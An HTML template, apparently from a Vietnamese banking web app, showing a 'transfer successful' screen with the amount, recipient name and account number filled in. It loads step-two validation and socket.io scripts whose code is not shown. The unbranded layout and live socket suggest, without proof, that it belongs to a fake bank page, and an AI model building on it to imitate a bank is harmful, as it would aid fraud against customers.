<html>

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="shortcut icon" href="/Content/Images/favicon.png">
    <link href="https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre&display=swap" rel="stylesheet">
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="/js/step2validate.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <title>Xác Nhận Chuyển Khoản</title>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.2.0/socket.io.js"></script>
    <script src="/js/connect-socket.js" ></script>
</head>

<body >
    <link href="/fonts/font-awesome-4.7.0/css/font-awesome.min.css" rel="stylesheet">
  
    
    <div class="container-fluid">
        
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6"  style="margin: 0% auto;padding: 0">
                <div class="header-gd">
                    Kết quả giao dịch
                </div>
                <div>
                    <div class="image-tick">
                        <img src="/img/tick.jpg" alt="" height="200px" width="200px">
                    </div>
                    <div class="content-center">
                        <b> Quý khách đã thực hiện <br>
                        chuyển khoản thành công <span class="text-color-blu"> <%=data.numbermoney %> VND </span> </br>
                        cho <span class="text-color-blu" style="text-transform:uppercase"> <%=data.name %></span> số tài khoản <br>
                           <span class="text-color-blu"><%=data.numberaccount %></span>  </b>
                    </div>
                    <div style="margin-top: 30px">
                        <div class="text-center">
                            <button style="padding: 10px 30px;     background: white;
                            border-radius: 20px; border: 1px solid #358c21 ;color: #79ca66">Lưu Danh Bạ Thụ Hưởng</button>
                        </div>
                        <div class="text-center mt-4">
                            <button style="padding: 10px 30px; border-radius: 20px;background-image: linear-gradient(to right, rgba(65, 101, 73, 0.41), rgb(37, 162, 87)); color: white;border: 1px solid white">Thực Hiện Giao Dịch Khác</button>
                        </div>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
    
  
    <link rel="stylesheet" type="text/css" href="https://forms.toomarketer.com/Content/Site-nonejs.css?1564476603029">
    <link rel="stylesheet" type="text/css" href="https://forms.toomarketer.com/Content/pikaday.css">
</body>
<style>
    .header-gd{
        text-align: center;
        padding: 10px 0px;
        background-image: linear-gradient(to right, rgba(105, 224, 132, 0.41), rgb(37, 162, 87));
        color: white;
        font-size: 20px
    }
    .image-tick ,.content-center {
        text-align: center;
    }
    .content-center
    {
        line-height: 1.6;
    }
    .text-color-blu{
        color: #72c322e6
    }
</style>
</html>